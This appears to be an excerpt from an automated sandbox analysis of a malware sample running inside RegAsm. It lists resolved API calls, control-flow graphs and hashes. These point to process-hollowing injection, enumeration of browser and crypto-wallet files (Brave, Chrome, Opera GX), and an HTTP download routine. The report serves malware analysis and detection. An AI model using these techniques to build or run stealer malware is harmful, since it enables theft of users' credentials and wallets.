                                              • GetProcAddress.KERNEL32 ref: 00418BC9
                                              • GetProcAddress.KERNEL32 ref: 00418BE0
                                              • GetProcAddress.KERNEL32 ref: 00418BF7
                                              • GetProcAddress.KERNEL32 ref: 00418C0E
                                              • GetProcAddress.KERNEL32 ref: 00418C25
                                              • GetProcAddress.KERNEL32 ref: 00418C3C
                                              • GetProcAddress.KERNEL32 ref: 00418C53
                                              • GetProcAddress.KERNEL32 ref: 00418C6A
                                              • GetProcAddress.KERNEL32 ref: 00418C81
                                              • GetProcAddress.KERNEL32 ref: 00418C98
                                              • GetProcAddress.KERNEL32 ref: 00418CAF
                                              • GetProcAddress.KERNEL32 ref: 00418CC6
                                              • GetProcAddress.KERNEL32 ref: 00418CDD
                                              • GetProcAddress.KERNEL32 ref: 00418CF4
                                              • GetProcAddress.KERNEL32 ref: 00418D0B
                                              • GetProcAddress.KERNEL32 ref: 00418D22
                                              • GetProcAddress.KERNEL32 ref: 00418D39
                                              • GetProcAddress.KERNEL32 ref: 00418D50
                                              • GetProcAddress.KERNEL32 ref: 00418D67
                                              • GetProcAddress.KERNEL32 ref: 00418D7E
                                              • GetProcAddress.KERNEL32 ref: 00418D95
                                              • GetProcAddress.KERNEL32 ref: 00418DAC
                                              • GetProcAddress.KERNEL32 ref: 00418DC3
                                              • GetProcAddress.KERNEL32 ref: 00418DDA
                                              • GetProcAddress.KERNEL32 ref: 00418DF1
                                              • GetProcAddress.KERNEL32 ref: 00418E08
                                              • GetProcAddress.KERNEL32 ref: 00418E1F
                                              • GetProcAddress.KERNEL32 ref: 00418E36
                                              • GetProcAddress.KERNEL32 ref: 00418E4D
                                              • GetProcAddress.KERNEL32 ref: 00418E64
                                              • GetProcAddress.KERNEL32 ref: 00418E7B
                                              • GetProcAddress.KERNEL32 ref: 00418E92
                                              • GetProcAddress.KERNEL32 ref: 00418EA9
                                              • GetProcAddress.KERNEL32 ref: 00418EC0
                                              • GetProcAddress.KERNEL32 ref: 00418ED7
                                              • GetProcAddress.KERNEL32(CreateProcessA), ref: 00418EED
                                              • GetProcAddress.KERNEL32(GetThreadContext), ref: 00418F03
                                              • GetProcAddress.KERNEL32(ReadProcessMemory), ref: 00418F19
                                              • GetProcAddress.KERNEL32(VirtualAllocEx), ref: 00418F2F
                                              • GetProcAddress.KERNEL32(ResumeThread), ref: 00418F45
                                              • GetProcAddress.KERNEL32(WriteProcessMemory), ref: 00418F5B
                                              • GetProcAddress.KERNEL32(SetThreadContext), ref: 00418F71
                                              • LoadLibraryA.KERNEL32(00417EFC,?,00000034,00000032,00414423,004125B9,?,00000040,00000064,004143DA,00413A82,?,0000002C,00000064,00414359,00414396), ref: 00418F82
                                              • LoadLibraryA.KERNEL32 ref: 00418F93
                                              • LoadLibraryA.KERNEL32 ref: 00418FA4
                                              • LoadLibraryA.KERNEL32 ref: 00418FB5
                                              • LoadLibraryA.KERNEL32 ref: 00418FC6
                                              • LoadLibraryA.KERNEL32 ref: 00418FD7
                                              • LoadLibraryA.KERNEL32 ref: 00418FE8
                                              • LoadLibraryA.KERNEL32 ref: 00418FF9
                                              • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00419009
                                              • GetProcAddress.KERNEL32(75FD0000), ref: 00419024
                                              • GetProcAddress.KERNEL32 ref: 0041903B
                                              • GetProcAddress.KERNEL32 ref: 00419052
                                              • GetProcAddress.KERNEL32 ref: 00419069
                                              • GetProcAddress.KERNEL32 ref: 00419080
                                              • GetProcAddress.KERNEL32(734B0000), ref: 0041909F
                                              • GetProcAddress.KERNEL32 ref: 004190B6
                                              • GetProcAddress.KERNEL32 ref: 004190CD
                                              • GetProcAddress.KERNEL32 ref: 004190E4
                                              • GetProcAddress.KERNEL32 ref: 004190FB
                                              • GetProcAddress.KERNEL32 ref: 00419112
                                              • GetProcAddress.KERNEL32 ref: 00419129
                                              • GetProcAddress.KERNEL32 ref: 00419140
                                              • GetProcAddress.KERNEL32(763B0000), ref: 0041915B
                                              • GetProcAddress.KERNEL32 ref: 00419172
                                              • GetProcAddress.KERNEL32 ref: 00419189
                                              • GetProcAddress.KERNEL32 ref: 004191A0
                                              • GetProcAddress.KERNEL32 ref: 004191B7
                                              • GetProcAddress.KERNEL32(750F0000), ref: 004191D6
                                              • GetProcAddress.KERNEL32 ref: 004191ED
                                              • GetProcAddress.KERNEL32 ref: 00419204
                                              • GetProcAddress.KERNEL32 ref: 0041921B
                                              • GetProcAddress.KERNEL32 ref: 00419232
                                              • GetProcAddress.KERNEL32 ref: 00419249
                                              • GetProcAddress.KERNEL32(75A50000), ref: 00419268
                                              • GetProcAddress.KERNEL32 ref: 0041927F
                                              • GetProcAddress.KERNEL32 ref: 00419296
                                              • GetProcAddress.KERNEL32 ref: 004192AD
                                              • GetProcAddress.KERNEL32 ref: 004192C4
                                              • GetProcAddress.KERNEL32 ref: 004192DB
                                              • GetProcAddress.KERNEL32 ref: 004192F2
                                              • GetProcAddress.KERNEL32 ref: 00419309
                                              • GetProcAddress.KERNEL32 ref: 00419320
                                              • GetProcAddress.KERNEL32(75070000), ref: 0041933B
                                              • GetProcAddress.KERNEL32 ref: 00419352
                                              • GetProcAddress.KERNEL32 ref: 00419369
                                              • GetProcAddress.KERNEL32 ref: 00419380
                                              • GetProcAddress.KERNEL32 ref: 00419397
                                              • GetProcAddress.KERNEL32(74E50000), ref: 004193B2
                                              • GetProcAddress.KERNEL32 ref: 004193C9
                                              • GetProcAddress.KERNEL32(75320000), ref: 004193E4
                                              • GetProcAddress.KERNEL32 ref: 004193FB
                                              • GetProcAddress.KERNEL32(6F080000), ref: 0041941A
                                              • GetProcAddress.KERNEL32 ref: 00419431
                                              • GetProcAddress.KERNEL32 ref: 00419448
                                              • GetProcAddress.KERNEL32 ref: 0041945F
                                              • GetProcAddress.KERNEL32 ref: 00419476
                                              • GetProcAddress.KERNEL32 ref: 0041948D
                                              • GetProcAddress.KERNEL32 ref: 004194A4
                                              • GetProcAddress.KERNEL32 ref: 004194BB
                                              • GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 004194D1
                                              • GetProcAddress.KERNEL32(InternetSetOptionA), ref: 004194E7
                                              • GetProcAddress.KERNEL32(74E00000), ref: 00419502
                                              • GetProcAddress.KERNEL32 ref: 00419519
                                              • GetProcAddress.KERNEL32 ref: 00419530
                                              • GetProcAddress.KERNEL32 ref: 00419547
                                              • GetProcAddress.KERNEL32(74DF0000), ref: 00419562
                                              • GetProcAddress.KERNEL32(6CA10000), ref: 0041957D
                                              • GetProcAddress.KERNEL32 ref: 00419594
                                              • GetProcAddress.KERNEL32 ref: 004195AB
                                              • GetProcAddress.KERNEL32 ref: 004195C2
                                              • GetProcAddress.KERNEL32(6C880000,SymMatchString), ref: 004195DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$LibraryLoad
                                              • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                              • API String ID: 2238633743-2740034357
                                              • Opcode ID: 2f514aa4515eb04d515bdb042a0ac87ba7fa7662099484ee2dbd85a5f1dc5103
                                              • Instruction ID: 8fd5fbfe85fd65639e2b99cb818a07d7a24d31bb6aca5b434a5a80c0a52a7b57
                                              • Opcode Fuzzy Hash: 2f514aa4515eb04d515bdb042a0ac87ba7fa7662099484ee2dbd85a5f1dc5103
                                              • Instruction Fuzzy Hash: BD521B7D490284EFEB565F61FD189653BB7F70BB413007026EA198A630EB3248E9EF54

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1221 40d2ff-40d3b1 _EH_prolog call 41070b call 410810 call 410884 call 4107c9 call 410776 * 2 call 41070b * 2 call 410935 FindFirstFileA 1240 40d3b3-40d3f3 call 410776 * 3 call 401061 call 410776 1221->1240 1241 40d3f8-40d3fe 1221->1241 1273 40e05a-40e07f call 410776 * 2 1240->1273 1243 40d400-40d414 StrCmpCA 1241->1243 1245 40dffa-40e00c FindNextFileA 1243->1245 1246 40d41a-40d42e StrCmpCA 1243->1246 1245->1243 1248 40e012-40e057 FindClose call 410776 * 3 call 401061 call 410776 1245->1248 1246->1245 1249 40d434-40d4c0 call 41077f call 410810 call 410884 * 2 call 4107c9 call 410776 * 3 1246->1249 1248->1273 1288 40d625-40d6ba call 410884 * 4 call 4107c9 call 410776 * 3 1249->1288 1289 40d4c6-40d4df call 410935 StrCmpCA 1249->1289 1338 40d6c0-40d6e2 call 410776 call 410935 StrCmpCA 1288->1338 1294 40d585-40d620 call 410884 * 4 call 4107c9 call 410776 * 3 1289->1294 1295 40d4e5-40d580 call 410884 * 4 call 4107c9 call 410776 * 3 1289->1295 1294->1338 1295->1338 1347 40d901-40d916 StrCmpCA 1338->1347 1348 40d6e8-40d6fc StrCmpCA 1338->1348 1350 40d918-40d97b call 4010b1 call 410742 * 3 call 40cf01 1347->1350 1351 40d98b-40d9a0 StrCmpCA 1347->1351 1348->1347 1349 40d702-40d87b call 41070b call 411944 call 410884 call 410810 call 410884 call 410810 call 4107c9 call 410776 * 5 call 410935 * 2 call 41070b call 410884 * 2 call 4107c9 call 410776 * 2 call 410742 call 406cc8 1348->1349 1559 40d8ca-40d8fc call 410935 call 4108fc call 410935 call 410776 * 2 1349->1559 1560 40d87d-40d8c5 call 410742 call 4010b1 call 415865 call 410776 1349->1560 1408 40d980-40d986 1350->1408 1353 40d9a2-40d9b9 call 410935 StrCmpCA 1351->1353 1354 40da1c-40da37 call 410742 call 411ac5 1351->1354 1366 40df69-40df70 1353->1366 1367 40d9bf-40d9c2 1353->1367 1380 40dabd-40dad2 StrCmpCA 1354->1380 1381 40da3d-40da40 1354->1381 1371 40df72-40dfdf call 410742 * 2 call 41070b call 4010b1 call 40d2ff 1366->1371 1372 40dfea-40dff5 call 4108fc * 2 1366->1372 1367->1366 1374 40d9c8-40da1a call 4010b1 call 410742 * 2 1367->1374 1436 40dfe4 1371->1436 1372->1245 1421 40da9b-40daad call 410742 call 407277 1374->1421 1386 40dd56-40dd6b StrCmpCA 1380->1386 1387 40dad8-40dbc9 call 41070b call 411944 call 410884 call 410810 call 410884 call 410810 call 4107c9 call 410776 * 5 call 410935 * 2 CopyFileA 1380->1387 1381->1366 1389 40da46-40da98 call 4010b1 call 410742 call 41070b 1381->1389 1386->1366 1397 40dd71-40de62 call 41070b call 411944 call 410884 call 410810 call 410884 call 410810 call 4107c9 call 410776 * 5 call 410935 * 2 CopyFileA 1386->1397 1500 40dcad-40dcc6 call 410935 StrCmpCA 1387->1500 1501 40dbcf-40dca7 call 4010b1 call 410742 * 3 call 40796a call 4010b1 call 410742 * 3 call 4083d3 1387->1501 1389->1421 1507 40df46-40df58 call 410935 DeleteFileA call 4108fc 1397->1507 1508 40de68-40df40 call 4010b1 call 410742 * 3 call 407d06 call 4010b1 call 410742 * 3 call 408022 1397->1508 1408->1366 1442 40dab2-40dab8 1421->1442 1436->1372 1442->1366 1517 40dd37-40dd49 call 410935 DeleteFileA call 4108fc 1500->1517 1518 40dcc8-40dd31 call 4010b1 call 410742 * 3 call 408a07 1500->1518 1501->1500 1529 40df5d 1507->1529 1508->1507 1543 40dd4e-40dd51 1517->1543 1518->1517 1535 40df60-40df64 call 410776 1529->1535 1535->1366 1543->1535 1559->1347 1560->1559
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 0040D304
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                              • FindFirstFileA.KERNEL32(00000000,?,00426C27,00426C26,00000000,?,00426D70,?,?,00426C23,?,?,00000000), ref: 0040D3A5
                                              • StrCmpCA.SHLWAPI(?,00426D74,?,?,00000000), ref: 0040D40C
                                              • StrCmpCA.SHLWAPI(?,00426D78,?,?,00000000), ref: 0040D426
                                              • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00426D7C,?,?,00426C2A,?,?,00000000), ref: 0040D4D7
                                                • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                              • String ID: Brave$Google Chrome$H$Opera GX$Preferences$\BraveWallet\Preferences
                                              • API String ID: 3869166975-1816240570
                                              • Opcode ID: d91f2a67ca89b6b1106c9fc733d4a4b511ee9e20b1dc9e3ad6d0ff175d53c89e
                                              • Instruction ID: 53ddc256561e8616ae8c2f814ecd0b30af94b98153ab47dec96f8554ad320668
                                              • Opcode Fuzzy Hash: d91f2a67ca89b6b1106c9fc733d4a4b511ee9e20b1dc9e3ad6d0ff175d53c89e
                                              • Instruction Fuzzy Hash: 9282A570D0028DEADF15EBB5C956BDD7BB46F19308F10409EE449A31C2DBB81788CBA6

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2586 4041b2-404240 _EH_prolog call 410742 call 403a54 GetProcessHeap RtlAllocateHeap call 410935 InternetOpenA StrCmpCA 2593 404242 2586->2593 2594 404244-404247 2586->2594 2593->2594 2595 404378-40439b InternetCloseHandle call 410776 * 2 2594->2595 2596 40424d-404267 InternetConnectA 2594->2596 2609 40439e-4043ac 2595->2609 2597 40426d-40429c HttpOpenRequestA 2596->2597 2598 40436f-404372 InternetCloseHandle 2596->2598 2600 4042a2-4042a4 2597->2600 2601 404368-404369 InternetCloseHandle 2597->2601 2598->2595 2603 4042a6-4042b6 InternetSetOptionA 2600->2603 2604 4042bc-4042e7 HttpSendRequestA HttpQueryInfoA 2600->2604 2601->2598 2603->2604 2607 4042e9-404307 call 410776 * 2 2604->2607 2608 40430c-40431e call 41185f 2604->2608 2607->2609 2608->2607 2614 404320-404322 2608->2614 2614->2601 2616 404324 2614->2616 2618 404363-404366 2616->2618 2618->2601 2619 404326-404342 InternetReadFile 2618->2619 2619->2601 2620 404344-404361 call 4118b0 2619->2620 2620->2618
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 004041B7
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004041FE
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00404205
                                              • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404224
                                              • StrCmpCA.SHLWAPI(?), ref: 00404238
                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040425C
                                              • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404292
                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004042B6
                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004042C1
                                              • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 004042DF
                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404337
                                              • InternetCloseHandle.WININET(00000000), ref: 00404369
                                              • InternetCloseHandle.WININET(?), ref: 00404372
                                              • InternetCloseHandle.WININET(?), ref: 0040437B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandleHttp$H_prologHeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                              • String ID: GET
                                              • API String ID: 1687531150-1805413626
                                              • Opcode ID: 4ee50e438f1c7c7b70479a0ee2aa32a27f1256c7f2f2642d8561a6bee16b11f5
                                              • Instruction ID: 1523c0f0f9ef9ef31d6cb1d3877620ea5c7cf15edcd8f0a38c23a14e42f138c4
                                              • Opcode Fuzzy Hash: 4ee50e438f1c7c7b70479a0ee2aa32a27f1256c7f2f2642d8561a6bee16b11f5
                                              • Instruction Fuzzy Hash: 375180B2900219AFDF10EFE0DC85AEFBBB9EB49344F00512AFA11B6190D7745E85CB65

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2642 1b694cf0-1b694d2f 2643 1b694d30-1b694d86 call 1b68263a 2642->2643 2646 1b694d88-1b694d9b call 1b817fb0 2643->2646 2647 1b694daf 2643->2647 2652 1b6952cd-1b6952df call 1b6825bd 2646->2652 2653 1b694da1-1b694dad 2646->2653 2649 1b694db3-1b694dc2 call 1b819a70 2647->2649 2656 1b694dc8-1b694ddb 2649->2656 2657 1b69526f-1b695271 2649->2657 2653->2649 2658 1b694de0-1b694df0 2656->2658 2659 1b6952c8 2657->2659 2660 1b695273-1b69527a 2657->2660 2667 1b694e3c-1b694e43 2658->2667 2668 1b694df2-1b694dfe 2658->2668 2659->2652 2662 1b69527c-1b695283 2660->2662 2663 1b6952be 2660->2663 2665 1b69528f-1b6952b3 2662->2665 2666 1b695285-1b69528c 2662->2666 2669 1b6952c5 2663->2669 2665->2659 2682 1b6952b5-1b6952bc 2665->2682 2666->2665 2670 1b694e4d-1b694e68 2667->2670 2671 1b694e45-1b694e47 2667->2671 2668->2670 2681 1b694e00-1b694e03 2668->2681 2669->2659 2674 1b694e6a-1b694e6f 2670->2674 2675 1b694e71-1b694e7f 2670->2675 2671->2670 2676 1b69506d-1b69507b call 1b682f5e 2671->2676 2679 1b694e81-1b694e94 call 1b683f53 2674->2679 2675->2679 2688 1b6950eb-1b695102 call 1b6825bd 2676->2688 2689 1b69507d-1b695084 2676->2689 2693 1b694eac 2679->2693 2694 1b694e96-1b694eaa call 1b72cab0 2679->2694 2683 1b694e25-1b694e3a 2681->2683 2684 1b694e05-1b694e08 2681->2684 2682->2669 2683->2658 2684->2683 2690 1b694e0a-1b694e0d 2684->2690 2695 1b6950e1-1b6950e8 2689->2695 2696 1b695086-1b69508d 2689->2696 2690->2683 2692 1b694e0f-1b694e12 2690->2692 2692->2683 2703 1b694e14-1b694e17 2692->2703 2704 1b694eae-1b694ed1 2693->2704 2694->2704 2695->2688 2700 1b695099-1b6950bd 2696->2700 2701 1b69508f-1b695096 2696->2701 2700->2688 2722 1b6950bf-1b6950e0 call 1b6825bd 2700->2722 2701->2700 2703->2683 2706 1b694e19-1b694e1c 2703->2706 2708 1b694ed5-1b694eec CreateFileW 2704->2708 2706->2683 2710 1b694e1e-1b694e23 2706->2710 2712 1b694ef2-1b694ef7 2708->2712 2713 1b694f95 2708->2713 2710->2670 2710->2683 2715 1b694ef9-1b694f09 2712->2715 2716 1b694f40-1b694f4c 2712->2716 2714 1b694f99-1b694f9b 2713->2714 2720 1b694f9d-1b694fc1 call 1b68415b 2714->2720 2721 1b694fc4-1b694fc7 2714->2721 2718 1b694f0b 2715->2718 2719 1b694f0d-1b694f2e call 1b698c40 2715->2719 2731 1b694f4e-1b694f51 2716->2731 2732 1b694f91-1b694f93 2716->2732 2718->2719 2737 1b694f30 2719->2737 2738 1b694f32-1b694f34 2719->2738 2720->2721 2726 1b694fcd-1b694fdf call 1b682f5e 2721->2726 2727 1b695140-1b695146 2721->2727 2742 1b694fe1-1b694fe8 2726->2742 2743 1b695036-1b69503b 2726->2743 2729 1b695148-1b695152 2727->2729 2730 1b695154-1b69516d call 1b682f5e 2727->2730 2729->2730 2756 1b69516f-1b695176 2730->2756 2757 1b6951c4-1b6951c6 2730->2757 2740 1b694f73-1b694f8c 2731->2740 2741 1b694f53-1b694f56 2731->2741 2732->2714 2737->2738 2746 1b694f3c 2738->2746 2747 1b694f36-1b694f3a 2738->2747 2740->2708 2741->2740 2748 1b694f58-1b694f5b 2741->2748 2750 1b694fea-1b694ff1 2742->2750 2751 1b69502c 2742->2751 2752 1b695041-1b695046 2743->2752 2753 1b695103-1b69513f call 1b818850 call 1b786b50 call 1b6825bd 2743->2753 2746->2716 2747->2713 2747->2746 2748->2740 2749 1b694f5d-1b694f60 2748->2749 2749->2740 2758 1b694f62-1b694f65 2749->2758 2759 1b694ffd-1b695021 2750->2759 2760 1b694ff3-1b694ffa 2750->2760 2767 1b695033 2751->2767 2752->2753 2761 1b69504c-1b695068 2752->2761 2762 1b695178-1b69517f 2756->2762 2763 1b6951ba 2756->2763 2764 1b6951c8-1b6951ca 2757->2764 2765 1b6951cc 2757->2765 2758->2740 2768 1b694f67-1b694f6a 2758->2768 2759->2743 2793 1b695023-1b69502a 2759->2793 2760->2759 2761->2643 2770 1b69518b-1b6951af 2762->2770 2771 1b695181-1b695188 2762->2771 2775 1b6951c1 2763->2775 2769 1b6951d1-1b6951e2 2764->2769 2765->2769 2767->2743 2768->2740 2773 1b694f6c-1b694f71 2768->2773 2777 1b6951e8-1b6951f3 2769->2777 2778 1b6951e4 2769->2778 2770->2757 2796 1b6951b1-1b6951b8 2770->2796 2771->2770 2773->2732 2773->2740 2775->2757 2783 1b69521f-1b69526e call 1b6825bd 2777->2783 2784 1b6951f5-1b695208 call 1b683f53 2777->2784 2778->2777 2794 1b69521b 2784->2794 2795 1b69520a-1b695219 call 1b72cab0 2784->2795 2793->2767 2794->2783 2795->2783 2795->2794 2796->2775
                                              APIs
                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,-00000003,04000102,00000000), ref: 1B694EE1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                              • API String ID: 823142352-3829269058
                                              • Opcode ID: 421658efa63a0565524c0a53a0b3e91a1b6a9b9b43b3e3cd593fb41c39c78513
                                              • Instruction ID: 036edba86511129cc82f3579e46b17062ea7e51350922e8e56c03acb78bdaf1e
                                              • Opcode Fuzzy Hash: 421658efa63a0565524c0a53a0b3e91a1b6a9b9b43b3e3cd593fb41c39c78513
                                              • Instruction Fuzzy Hash: 29F1B2F19443128FDB188F24E8857EB77E4FBA4B15F00092AF989C7291D735D948CB96
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 004114B1
                                              • CoCreateInstance.OLE32(00427E9C,00000000,00000001,004274E0,?,00000001,00000000,00000000,00000001,?,00000000), ref: 004114D8
                                              • SysAllocString.OLEAUT32(?), ref: 004114E5
                                              • _wtoi64.MSVCRT ref: 00411520
                                              • SysFreeString.OLEAUT32(?), ref: 00411533
                                              • SysFreeString.OLEAUT32(00000000), ref: 0041153A
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
